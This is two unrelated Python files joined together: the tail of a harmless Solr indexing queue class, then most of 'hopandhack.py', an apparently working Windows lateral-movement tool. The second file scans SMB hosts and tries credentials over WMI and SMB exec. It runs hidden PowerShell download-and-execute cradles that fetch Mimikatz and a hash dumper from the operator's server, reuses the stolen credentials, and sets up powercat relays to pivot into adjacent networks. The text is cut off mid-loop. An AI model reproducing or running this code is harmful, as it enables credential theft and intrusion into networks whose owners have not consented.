except Exception as e:
self.logger.error("Couldn't Complete {}".format(filepath))
self.logger.exception(e)
raise
return newpath
def _compress_and_move(self, source, destination):
try:
self.logger.debug("Compressing and Moving Completed file: {} -> {}".format(source, destination))
with gzip.open(destination, 'wb') as df, open(source, 'rb') as sf:
df.writelines(sf)
os.remove(source)
except Exception as e:
self.logger.error("Unable to Compress and Move file {} -> {}".format(source, destination))
self.logger.exception(e)
raise
return True
def index(self, solr, collection, threads=1, send_method='stream_file', **kwargs):
'''
Will index the queue into a specified solr instance and collection. Specify multiple threads to make this faster, however keep in mind that if you specify multiple threads the items may not be in order.
Example::
solr = SolrClient('http://localhost:8983/solr/')
for doc in self.docs:
index.add(doc, finalize=True)
index.index(solr,'SolrClient_unittest')
:param object solr: SolrClient object.
:param string collection: The name of the collection to index document into.
:param int threads: Number of simultaneous threads to spin up for indexing.
:param string send_method: SolrClient method to execute for indexing. Default is stream_file
'''
try:
method = getattr(solr, send_method)
except AttributeError:
raise AttributeError("Couldn't find the send_method. Specify either stream_file or local_index")
self.logger.info("Indexing {} into {} using {}".format(self._queue_name,
collection,
send_method))
if threads > 1:
if hasattr(collection, '__call__'):
self.logger.debug("Overwriting send_method to index_json")
method = getattr(solr, 'index_json')
method = partial(self._wrap_dynamic, method, collection)
else:
method = partial(self._wrap, method, collection)
with ThreadPool(threads) as p:
p.map(method, self.get_todo_items())
else:
for todo_file in self.get_todo_items():
try:
result = method(collection, todo_file)
if result:
self.complete(todo_file)
except SolrError:
self.logger.error("Error Indexing Item: {}".format(todo_file))
self._unlock()
raise
def _wrap(self, method, collection, doc):
#Indexes entire file into the collection
try:
res = method(collection, doc)
if res:
self.complete(doc)
return res
except SolrError:
self.logger.error("Error Indexing Item: {}".format(doc))
pass
def _wrap_dynamic(self, method, collection, doc):
# Reads the file, executing 'collection' function on each item to
# get the name of collection it should be indexed into
try:
j_data = self._open_file(doc)
temp = {}
for item in j_data:
try:
coll = collection(item)
if coll in temp:
temp[coll].append(item)
else:
temp[coll] = [item]
except Exception as e:
self.logger.error("Exception caught on dynamic collection function")
self.logger.error(item)
self.logger.exception(e)
raise
indexing_errors = 0
done = []
for coll in temp:
try:
res = method(coll, json.dumps(temp[coll]))
if res:
done.append(coll)
except Exception as e:
self.logger.error("Indexing {} items into {} failed".format(len(temp[coll]), coll))
indexing_errors += 1
if len(done) == len(temp.keys()) and indexing_errors == 0:
self.complete(doc)
return True
return False
except SolrError as e:
self.logger.error("Error Indexing Item: {}".format(doc))
self.logger.exception(e)
pass
def get_all_json_from_indexq(self):
'''
Gets all data from the todo files in indexq and returns one huge list of all data.
'''
files = self.get_all_as_list()
out = []
for efile in files:
out.extend(self._open_file(efile))
return out
def _open_file(self, efile):
if efile.endswith('.gz'):
f = gzip.open(efile, 'rt', encoding='utf-8')
else:
f = open(efile)
f_data = json.load(f)
f.close()
return f_data
def get_multi_q(self, sentinel='STOP'):
'''
This helps indexq operate in multiprocessing environment without each process having to have it's own IndexQ. It also is a handy way to deal with thread / process safety.
This method will create and return a JoinableQueue object. Additionally, it will kick off a back end process that will monitor the queue, de-queue items and add them to this indexq.
The returned JoinableQueue object can be safely passed to multiple worker processes to populate it with data.
To indicate that you are done writing the data to the queue, pass in the sentinel value ('STOP' by default).
Make sure you call join_indexer() after you are done to close out the queue and join the worker.
'''
self.in_q = JoinableQueue()
self.indexer_process = Process(target=self._indexer_process, args=(self.in_q, sentinel))
self.indexer_process.daemon = False
self.indexer_process.start()
return self.in_q
def join_indexer(self):
self.logger.info("Joining Queue")
self.in_q.join()
self.logger.info("Joining Index Process")
self.indexer_process.join()
def _indexer_process(self, in_q, sentinel):
self.logger.info("Indexing Process Started")
count = 0
total = 0
stime = time.time()
seen_STOP = False
while True:
if seen_STOP and in_q.qsize() == 0:
#If sentinel has been seen and the queue size is zero, write out the queue and return.
self.logger.info("Indexer Queue is empty. Stopping....")
self.add(finalize=True)
return
if in_q.qsize() < 1 and not seen_STOP:
#If there is nothing to do, just hang out for a few seconds
time.sleep(3)
continue
item = in_q.get()
if item == sentinel:
self.logger.info("Indexer Received Stop Command, stopping indexer. Queue size is {}".format(str(in_q.qsize())))
seen_STOP = True
in_q.task_done()
continue
count += 1
total += 1
self.add(item)
in_q.task_done()
if (time.time() - stime) > 60:
self.logger.debug("Indexed {} items in the last 60 seconds. Total: ".format(count, total))
count = 0
stime = time.time()
|
hopandhack.py
|
#!/usr/bin/env python
from deps.psexec import *
from deps.wmiexec import *
from deps.smbexec import *
from deps.secretsdump import *
from deps.smb_exploit1 import *
from deps.goldenPac import *
from signal import alarm, signal, SIGALRM, SIGKILL
from subprocess import Popen, PIPE
import threading
import smbexec2
from SocketServer import ThreadingMixIn, ForkingMixIn
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from netaddr import IPNetwork,IPAddress
import random
import sys
#import socket
import resource
from threading import Timer
import thread, time, sys
import time
import timeout_decorator
import gevent
import csv
import os,binascii
from shutil import copyfile
import glob
import Queue
import nmap
verbose=False
def timeout():
thread.interrupt_main()
bold=True
from termcolor import colored, cprint
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
class ForkingSimpleServer(ForkingMixIn, HTTPServer):
pass
#domain='workgroup'
#username='administrator'
#password='p@ssw0rd'
#relayPortNo=60000
relayPortNo=random.randint(60000,65000)
hashes=None
aesKey=None
k=False
dc_ip=None
mode='SHARE'
share='C$'
powershellArgs=' -NoP -NonI -W Hidden -ep bypass '
tmpFilename1=binascii.b2a_hex(os.urandom(20))+".ps1" #Get-PassHashes.ps1
tmpFilename2=binascii.b2a_hex(os.urandom(20))+".ps1" #Invoke-Mimikatz.ps1
tmpFilename3=binascii.b2a_hex(os.urandom(20))+".ps1" #Invoke-Ping.ps1
tmpFilename4=binascii.b2a_hex(os.urandom(20))+".ps1" #Invoke-Portscan.ps1
tmpFilename5=binascii.b2a_hex(os.urandom(20))+".ps1" #powercat.ps1
tmpFilename6=binascii.b2a_hex(os.urandom(20))+".ps1" #Start-WebServer.ps1
web_dir = os.getcwd()+"/modules"
orig_dir = os.getcwd()
for f in glob.glob(web_dir+"/*.ps1"):
tmpFilename=f.replace(web_dir+"/","")
tmpFilename=tmpFilename.replace(".ps1","")
if len(tmpFilename)>19:
os.remove(f)
copyfile(web_dir+"/Get-PassHashes.ps1", web_dir+"/"+tmpFilename1)
copyfile(web_dir+"/Invoke-Mimikatz.ps1", web_dir+"/"+tmpFilename2)
copyfile(web_dir+"/Invoke-Ping.ps1", web_dir+"/"+tmpFilename3)
copyfile(web_dir+"/Invoke-Portscan.ps1", web_dir+"/"+tmpFilename4)
copyfile(web_dir+"/powercat.ps1", web_dir+"/"+tmpFilename5)
copyfile(web_dir+"/start-WebServer.ps1", web_dir+"/"+tmpFilename6)
userPassList=[]
compromisedHostList=[]
class ThreadingExample(object):
targetIP=''
targetPort=0
#def __init__(self, interval=1):
def __init__(self, ip, portNo):
interval=10
self.interval = interval
self.ip = ip
self.portNo = portNo
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
while True:
# Do something
#print('Doing something imporant in the background')
#if not isOpen(self.ip, self.portNo):
# print "Down: "+self.ip+":"+str(self.portNo)
#else:
# print "Up: "+self.ip+":"+str(self.portNo)
time.sleep(self.interval)
class relayThread(object):
def __init__(self, ip, targetIP, portNo, hopPoint1List, hopPoint2List):
self.hopPoint1List=hopPoint1List
self.hopPoint2List=hopPoint2List
threads=[]
self.ip = ip
self.targetIP = targetIP
self.portNo = portNo
#t = threading.Thread(target=self.runWebServer, args=())
threads = list()
t = threading.Thread(target=self.run, args=())
threads.append(t)
t1 = threading.Thread(target=self.runWebServer, args=())
threads.append(t1)
t.start()
t1.start()
#print t1.isAlive()
#thread.start_new_thread(self.run, ())
#thread.start_new_thread(self.runWebServer, ())
def runWebServer(self):
print (setColor("[+]", bold, color="blue"))+" Starting Web Server on host "+self.targetIP+":8000"
complete=False
while complete==False:
domain=self.hopPoint1List[0][0]
username=self.hopPoint1List[0][1]
password=self.hopPoint1List[0][2]
#command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -nop -enc JABIAHMAbwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAEgAdAB0AHAATABpAHMAdABlAG4AZQByADsAJABIAHMAbwAuAFAAcgBlAGYAaQB4AGUAcwAuAEEAZABkACgAIgBoAHQAdABwADoALwAvACsAOgA4ADAAMAAwAC8AIgApADsAJABIAHMAbwAuAFMAdABhAHIAdAAoACkAOwBXAGgAaQBsAGUAIAAoACQASABzAG8ALgBJAHMATABpAHMAdABlAG4AaQBuAGcAKQB7ACQASABDAD0AJABIAHMAbwAuAEcAZQB0AEMAbwBuAHQAZQB4AHQAKAApADsAJABIAFIAZQBzAD0AJABIAEMALgBSAGUAcwBwAG8AbgBzAGUAOwAkAEgAUgBlAHMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIALAAiAHQAZQB4AHQALwBwAGwAYQBpAG4AIgApADsAJABCAHUAZgA9AFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAKABHAEMAIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAJABQAHcAZAAgACgAJABIAEMALgBSAGUAcQB1AGUAcwB0ACkALgBSAGEAdwBVAHIAbAApACkAKQA7ACQASABSAGUAcwAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgANgA0AD0AJABCAHUAZgAuAEwAZQBuAGcAdABoADsAJABIAFIAZQBzAC4ATwB1AHQAcAB1AHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAEIAdQBmACwAMAAsACQAQgB1AGYALgBMAGUAbgBnAHQAaAApADsAJABIAFIAZQBzAC4AQwBsAG8AcwBlACgAKQB9ADsAJABIAHMAbwAuAFMAdABvAHAAKAApAA=="
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" -nop -file C:\\windows\\temp\\"+tmpFilename6+" \"http://+:8000/\""
if verbose==True:
print command
portNo=445
executer = smbexec2.CMDEXEC(username, password, domain, hashes, aesKey, k, dc_ip, mode, share, portNo, command)
executer.run(self.ip, self.ip)
results=executer.getOutput()
complete=True
def run(self):
complete=False
while complete==False:
print (setColor("[+]", bold, color="blue"))+" Starting Relay on host: "+self.targetIP+":"+str(self.portNo)
#command="cmd /c powershell.exe -Command \"IEX (New-Object System.Net.Webclient).DownloadString('http://"+myIP+":8888/powercat.ps1'); powercat -l -p "+str(self.portNo)+" -rep -r tcp:"+self.targetIP+":445\""
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" -Command \"IEX (New-Object System.Net.Webclient).DownloadString('http://"+myIP+":8888/"+tmpFilename5+"'); powercat -l -p "+str(self.portNo)+" -rep -r tcp:"+self.targetIP+":445\""
if verbose==True:
print command
results,status=runWMIEXEC(self.ip, domain, username, password, passwordHash, command)
if "SessionError" in str(results):
print "Sleeping for 5 seconds"
time.sleep(5)
else:
complete=True
def setColor(message, bold=True, color=None, onColor=None):
retVal = colored(message, color=color, on_color=onColor, attrs=("bold",))
return retVal
def runCommand(args, cwd = None, shell = False, kill_tree = True, timeout = -1, env = None):
class Alarm(Exception):
pass
def alarm_handler(signum, frame):
raise Alarm
p = Popen(args, shell = shell, cwd = cwd, stdout = PIPE, stderr = PIPE, env = env)
if timeout != -1:
signal(SIGALRM, alarm_handler)
alarm(timeout)
try:
stdout, stderr = p.communicate()
if timeout != -1:
alarm(0)
except Alarm:
pids = [p.pid]
if kill_tree:
pids.extend(get_process_children(p.pid))
for pid in pids:
# process might have died before getting to this line
# so wrap to avoid OSError: no such process
try:
kill(pid, SIGKILL)
except OSError:
pass
return -9, '', ''
return p.returncode, stdout, stderr
def parseMimikatzOutput(list1):
tmpPasswordList=[]
username1=""
domain1=""
password1=""
lmHash=""
ntHash=""
list2=list1.split("\n")
for x in list2:
if "Username :" in x or "Domain :" in x or "Password :" in x or "LM :" in x or "NTLM :" in x:
if "* Username :" in x:
username1=(x.replace("* Username :","")).strip()
if "* Domain :" in x:
domain1=(x.replace("* Domain :","")).strip()
if "* LM :" in x:
lmHash=(x.replace("* LM :","")).strip()
if "* NTLM :" in x:
ntHash=(x.replace("* NTLM :","")).strip()
if len(lmHash)<1:
lmHash='aad3b435b51404eeaad3b435b51404ee'
password1=lmHash+":"+ntHash
if "* Password :" in x:
password1=x.replace("* Password :","")
domain1=domain1.strip()
username1=username1.strip()
password1=password1.strip()
if len(username1)>1 and len(domain1)>1 and len(password1)>1:
#if (domain1!="(null)" or username1!="(null)" or password1!="(null)"):
if domain1!="(null)":
if not username1.endswith("$") and len(password1)<50:
if "\\" in username1:
domain1=username1.split("\\")[0]
username1=username1.split("\\")[1]
if len(password1)>0 and password1!='(null)':
if [domain1,username1,password1] not in tmpPasswordList:
tmpPasswordList.append([str(domain1),str(username1),str(password1)])
username1=""
domain1=""
password1=""
lmHash=""
ntHash=""
return tmpPasswordList
def get_ip_address():
command="ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\\2/p'"
results = runCommand(command, shell = True, timeout = 15)
resultList=results[1].split("\n")
return resultList[0]
def my_tcp_server():
port=8888
server = ThreadingSimpleServer(('', port), SimpleHTTPRequestHandler)
# server = ThreadingSimpleServer(('', port), RequestHandler)
addr, port = server.server_address
#print (setColor("[+]", bold, color="green"))+" Starting web server"
try:
while 1:
sys.stdout.flush()
server.handle_request()
except KeyboardInterrupt:
print "Finished"
def isOpen(ip,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, int(port)))
s.shutdown(2)
return True
except:
return False
def isOpen1(ip,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, int(port)))
s.shutdown(2)
if [ip,port] not in liveList:
liveList.append([ip,port])
return True
except Exception as e:
return False
def runWMIEXEC(targetIP,domain,username,password,passwordHash,command):
resultsOutput=''
aesKey = None
share = 'ADMIN$'
nooutput = False
k = False
dc_ip = None
executer = WMIEXEC(command,username,password,domain,passwordHash,aesKey,share,nooutput,k,dc_ip)
statusOutput=executer.run(targetIP)
resultsOutput=executer.getOutput()
return resultsOutput,statusOutput
def runSMBEXEC(targetIP,portNo,domain,username,password,passwordHash,command):
executer = CMDEXEC(username, password, domain, passwordHash, None, False, None, "SHARE", "C$", int(portNo), command)
executer.run(targetIP, targetIP)
resultsOutput = executer.getOutput()
executer.stop()
return resultsOutput
def scanThread(ip, port):
try:
t = threading.Thread(target=isOpen1, args=(ip, port))
t.start()
except Exception as e:
print e
pass
def tcp_scan((target, port)):
target, port = (target, port)
try:
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1,0))
conn.settimeout(1)
ret = conn.connect_ex((target, port))
if (ret==0):
sys.stdout.write("[%s] %s - %d/tcp open (SYN-ACK packet)\n" % (date_time(), target, port))
ports_ident["open"].append(port)
elif (ret == 111):
sys.stdout.write("[%s] %s - %d/tcp closed (RST packet)\n" % (date_time(), target, port))
ports_ident["closed"].append(port)
elif (ret == 11):
ports_ident["filtered"].append(port)
else:
print port
except socket.timeout:
ports_ident["filtered"].append(port)
conn.close()
def multi_threader_tcp():
while True:
ip_and_port = q.get()
print ip_and_port
tcp_scan(ip_and_port)
q.task_done()
def testAccount(targetIP, domain, username, password, passwordHash):
if username!="guest":
if domain==None or len(domain)<1:
domain='WORKGROUP'
cmd='whoami'
complete=False
results=''
status=''
while complete==False:
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd)
if "can't start new thread" not in str(status):
complete=True
if 'STATUS_LOGON_FAILURE' in str(status):
if len(domain)>0:
print (setColor("[-]", bold, color="red"))+" "+targetIP+":445 | "+domain+"\\"+username+":"+password+" [Failed]"
else:
print (setColor("[-]", bold, color="red"))+" "+targetIP+":445 | "+username+":"+password+" [Failed]"
return False
elif 'rpc_s_access_denied' in str(status) or 'WBEM_E_ACCESS_DENIED' in str(status) or 'access_denied' in str(status).lower():
if len(domain)>0:
print (setColor("[-]", bold, color="red"))+" "+targetIP+":445 | "+domain+"\\"+username+":"+password+" [OK][Not Admin]"
else:
print (setColor("[-]", bold, color="red"))+" "+targetIP+":445 | "+username+":"+password+" [OK][Not Admin]"
return False
else:
#if len(domain)>0:
# print (setColor("[+]", bold, color="green"))+" "+targetIP+":445 | "+domain+"\\"+username+":"+password+" "+(setColor("[OK][Admin]", bold, color="green"))
#else:
# print (setColor("[+]", bold, color="green"))+" "+targetIP+":445 | "+username+":"+password+" "+(setColor("[OK][Admin]", bold, color="green"))
return True
@timeout_decorator.timeout(30)
def testMapDrive(tmpdomain,tmpusername,tmppassword):
results=''
command="net use \\\\"+ip+"\C$ "+tmppassword+" /USER:"+tmpdomain+"\\"+tmpusername
if verbose==True:
print command
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
if verbose==True:
print results
return results
def monitor_server(ip,port):
time.sleep(10)
try:
while 1:
if not isOpen(ip,port):
print "Down: "+ip+":"+str(port)
time.sleep(10)
except KeyboardInterrupt:
print "Finished1"
parser = argparse.ArgumentParser(
prog='PROG',
formatter_class=argparse.RawDescriptionHelpFormatter,
description=('''\
'''))
parser.add_argument("target", nargs='*', type=str, help="File containing a list of targets (e.g. 192.168.1.0/24 or 192.168.1.2)")
parser.add_argument("-C", type=str, dest="tmpCredList", help="File containing credentials (Domain||Username||Password)")
parser.add_argument("-d", type=str, dest="tmpDomain", help="Domain")
parser.add_argument("-u", type=str, dest="tmpUsername", help="Username")
parser.add_argument("-p", type=str, dest="tmpPassword", help="Password")
parser.add_argument("-D", "--debug", action='store_true', help="Verbose mode")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
inputStr=args.target[0]
if args.debug:
verbose=True
if args.tmpCredList:
if os.path.exists(orig_dir+"/"+args.tmpCredList):
with open(orig_dir+"/"+args.tmpCredList) as f:
lines = f.read().splitlines()
for x in lines:
domain1=x.split("||")[0]
username1=x.split("||")[1]
password1=x.split("||")[2]
if [domain1,username1,password1] not in userPassList:
userPassList.append([domain1,username1,password1])
if args.tmpDomain and args.tmpUsername and args.tmpPassword:
if [args.tmpDomain,args.tmpUsername,args.tmpPassword] not in userPassList:
userPassList.append([args.tmpDomain,args.tmpUsername,args.tmpPassword])
try:
os.chdir(web_dir)
threading.Thread(target=my_tcp_server).start()
myIP=get_ip_address()
ipList=[]
liveList=[]
portList=[]
portList.append("445")
if "/" in inputStr:
for x in IPNetwork(inputStr):
if str(x) not in ipList:
ipList.append(str(x))
else:
if os.path.exists(orig_dir+"/"+inputStr):
with open(orig_dir+"/"+inputStr) as f:
lines = f.read().splitlines()
for x in lines:
ipList.append(x)
'''
if "/" in x:
for y in IPNetwork(x):
if str(y) not in ipList:
if str(y) not in ipList:
ipList.append(str(y))
else:
if x not in ipList:
ipList.append(x)
'''
else:
ipList.append(inputStr)
'''
resource.setrlimit(resource.RLIMIT_NOFILE, (1024, 3000))
screenLock = threading.Semaphore(value=3)
for port in portList:
for x in ipList:
scanThread(x, port)
'''
nm = nmap.PortScanner()
for x in ipList:
nm.scan(x,'445')
tmpHostList=nm.all_hosts()
for y in tmpHostList:
if not y.endswith(".1") and not y.endswith(".255"):
if y not in liveList:
liveList.append(y)
print (setColor("[+]", bold, color="blue"))+" Checking for live IPs provided in file: "+inputStr
for x in liveList:
print "Found IP on Same Subnet: "+x
if x in ipList:
ipList.remove(x)
for x in ipList:
if x.endswith(".1") or x.endswith(".255"):
ipList.remove(x)
ipList[:] = [item for item in ipList if item != '']
for x in liveList:
targetIP=x
finalComplete=False
while finalComplete==False:
for y in userPassList:
if targetIP not in compromisedHostList:
domain=y[0]
username=y[1]
password=y[2]
passwordHash=None
if testAccount(targetIP, domain, username, password, passwordHash)==True:
print "\n"+(setColor("[+]", bold, color="green"))+" Testing credentials against "+targetIP+(setColor(" [OK][ADMIN]", bold, color="green"))+" ("+domain+"\\"+username+"|"+password+")"
ipStr=",".join(ipList)
results=''
#cmd="powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/milo2012/fccfe135d3b2646f191a83f8107971c8/raw/838011a6545b23c1c1775955501f3da54cd488cd/Invoke-Ping.ps1'); Invoke-Ping -Quiet "+ipStr+"\""
complete=False
print (setColor("[+]", bold, color="green"))+" Dumping password hashes from "+targetIP
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/"+tmpFilename1+"'); Get-PassHashes\""
if verbose==True:
print command
while complete==False:
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
results=results.replace("\r","")
results=results.replace("\n","")
if len(results)>2:
complete=True
else:
print "Sleeping for 3 seconds"
time.sleep(3)
tmpResultList=results.split(":::")
if len(tmpResultList)>0:
print "\n"
for z in tmpResultList:
z=z.strip()
if len(z)>0:
print z+":::"
print "\n"
if targetIP not in compromisedHostList:
compromisedHostList.append(targetIP)
complete=False
while complete==False:
print (setColor("[+]", bold, color="green"))+" Running Mimikatz against "+targetIP
#command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass \"IEX (New-Object Net.WebClient).DownloadString('http://"+tmpSelectedIP+":8000/download?filepath=C:\windows\\temp\Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\""
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/"+tmpFilename2+"');Invoke-Mimikatz -DumpCreds\""
if verbose==True:
print command
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
if "Could not connect: timed out" in str(results):
print "Sleeping for 3 seconds"
time.sleep(3)
else:
if len(str(results))>100:
tmpList=parseMimikatzOutput(results)
for x in tmpList:
tmpDomain=x[0]
tmpUsername=x[1]
tmpPassword=x[2]
print "\nIP: "+targetIP
print "Domain: "+x[0]
print "Username: "+x[1]
print "Password: "+x[2]
if [x[0],x[1],x[2]] not in userPassList:
userPassList.append([x[0],x[1],x[2]])
if targetIP not in compromisedHostList:
compromisedHostList.append(targetIP)
complete=True
complete=False
print "\n"+(setColor("[+]", bold, color="blue"))+" Ping sweep via host "+targetIP
while complete==False:
#cmd="powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/Invoke-Ping.ps1'); Invoke-Ping -Quiet "+ipStr+"\""
cmd="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" -Command \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/"+tmpFilename3+"'); Invoke-Ping -Quiet "+ipStr+"\""
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd)
if "timed out" in str(results) or "System.IO.IOException" in str(results):
print "Sleeping for 3 seconds"
time.sleep(3)
else:
complete=True
tmpResultlist=results.split("\n")
tmpResultlist1=[]
tmpIPList1=[]
for z in tmpResultlist:
if len(z)>0:
print "Found IP on Adjacent Network: "+z
tmpIPList1.append(str(z).strip())
tmpIPListStr1=",".join(tmpIPList1)
print "\n"+(setColor("[+]", bold, color="blue"))+" Looking for NetBIOS hosts via host: "+targetIP
#cmd ="powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/Invoke-Portscan.ps1'); Invoke-Portscan -Hosts "+tmpIPListStr1+" -ports 445 -noProgressMeter | Select-Object -ExpandProperty Hostname\""
cmd ="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" -Command \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/"+tmpFilename4+"'); Invoke-Portscan -Hosts "+tmpIPListStr1+" -ports '445,3389' -noProgressMeter | Select-Object Hostname,openPorts\""
if verbose==True:
print cmd
tmpNetbiosList=[]
tmpRDPList=[]
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd)
if len(results)>0 and "Exception" not in str(results):
tmpResultlist1=results.split("\n")
for z in tmpResultlist1:
if len(z)>0:
tmpHostNo=z.split(" ")[0]
if "445" in z:
print "Found port 445/tcp on host: "+tmpHostNo
if tmpHostNo not in tmpNetbiosList:
tmpNetbiosList.append(tmpHostNo)
if "3389" in z:
print "Found port 3389/tcp on host: "+tmpHostNo
if tmpHostNo not in tmpRDPList:
tmpRDPList.append(tmpHostNo)
else:
print "Unable to access "+myIP+":8000. Please restart."
os._exit(1)
print "\n"
for z in userPassList:
tmpdomain=z[0]
tmpusername=z[1]
tmppassword=z[2]
#tmpdomain="workgroup"
#tmpusername="milo"
#tmppassword="p@ssw0rd"
for ip in tmpNetbiosList:
ip=ip.strip()
results=''
results=testMapDrive(tmpdomain,tmpusername,tmppassword)
#Timer(30, timeout).start()
#command="net use \\\\"+ip+"\C$ "+tmppassword+" /USER:"+tmpdomain+"\\"+tmpusername
#results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
if "Login failure" in str(results) or "Access is denied" in str(results) or "The specified network password is not correct" in str(results):
if "Login failure" in str(results) or "The specified network password is not correct" in str(results):
print (setColor("[-]", bold, color="red"))+" Testing credentials against "+ip+(setColor(" [FAIL]", bold, color="red"))+" ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
if "Access is denied" in str(results):
print (setColor("[-]", bold, color="red"))+" Testing credentials against "+ip+(setColor(" [OK]", bold, color="red"))+" ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
else:
if "The command completed successfully" in str(results):
print (setColor("[+]", bold, color="green"))+" Testing credentials against "+ip+(setColor(" [OK][ADMIN]", bold, color="green"))+" ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
#print "\n"+(setColor("[+]", bold, color="green"))+" Found: "+tmpdomain+"\\"+tmpusername+":"+tmppassword+" ("+ip+")"
command='tasklist /FI "IMAGENAME eq powershell.exe" /FO CSV'
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
if "access_denied" in str(status).lower():
print (setColor("[+]", bold, color="red"))+" Invalid credentials"
os._exit(1)
if "powershell.exe" in results:
#print (setColor("[+]", bold, color="green"))+" Checking and killing existing powershell.exe processes"
command='taskkill /F /IM powershell.exe'
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
print "\n"+(setColor("[+]", bold, color="blue"))+" Listing all IP addresses on Host: "+targetIP
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" -Command (netsh i ip sh ad)-match'Address'-replace'.+:\s+(\S+)','$1'"
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
tmpResultList=results.split("\n")
tmpIPList=[]
for z in tmpResultList:
z=z.strip()
if "127.0.0.1" not in z:
if z not in tmpIPList and len(z)>0:
tmpIPList.append(z)
print (setColor("[+]", bold, color="blue"))+" Upload Temporary Files to Host: "+targetIP
#command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -ep bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/Start-WebServer.ps1\',\'C:\\windows\\temp\\Start-WebServer.ps1\');"'
command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe '+powershellArgs+' -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/'+tmpFilename6+'\',\'C:\\windows\\temp\\'+tmpFilename6+'\');"'
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
print results
#command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -ep bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/Invoke-Mimikatz.ps1\',\'C:\\windows\\temp\\Invoke-Mimikatz.ps1\');"'
command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe '+powershellArgs+' -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/'+tmpFilename2+'\',\'C:\\windows\\temp\\'+tmpFilename2+'\');"'
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
print results
#command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -ep bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/Get-PassHashes.ps1\',\'C:\\windows\\temp\\Get-PassHashes.ps1\');"'
command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe '+powershellArgs+' -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/'+tmpFilename1+'\',\'C:\\windows\\temp\\'+tmpFilename1+'\');"'
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
print results
hopPoint1=targetIP
hopPoint2=ip
hopPoint1List=[]
hopPoint1List.append([domain,username,password])
hopPoint2List=[]
hopPoint2List.append([tmpdomain,tmpusername,tmppassword])
example = relayThread(hopPoint1,hopPoint2,relayPortNo,hopPoint1List,hopPoint2List)
tmpSelectedIP=''
if len(tmpIPList)>1:
print (setColor("[+]", bold, color="green"))+" Host has multiple IP addresses: "+", ".join(tmpIPList)
print (setColor("[+]", bold, color="blue"))+" Checking which IP address on "+targetIP+" is accessible by "+ip
while len(tmpSelectedIP)<1:
for z in tmpIPList:
